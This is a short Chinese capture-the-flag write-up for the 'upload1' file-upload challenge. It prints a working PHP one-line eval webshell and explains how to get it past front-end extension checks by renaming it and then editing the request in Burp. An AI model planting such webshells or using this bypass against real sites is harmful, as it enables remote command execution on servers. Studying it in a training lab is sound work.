0
点赞
收藏
分享

微信扫一扫

攻防世界upload1

半夜放水 2022-01-31 阅读 66
upload1

在这里插入图片描述

进入环境就一个上传,我们先上传一个普通的木马文件看看

木马内容

<?php @eval($_POST["cmd"]); ?>

在这里插入图片描述

估计是前端校验我们查看源码

在这里插入图片描述

只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可

在这里插入图片描述

在这里插入图片描述

然后访问木马文件执行指令即可

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

执行后查看源码便发现flag

在这里插入图片描述

举报

相关推荐

[ACTF2020 新生赛]Upload1

攻防世界re1

攻防世界--Confusion1

攻防世界wp(web1)

攻防世界 WEB

攻防世界 —— hacknote

攻防世界logmein

0 条评论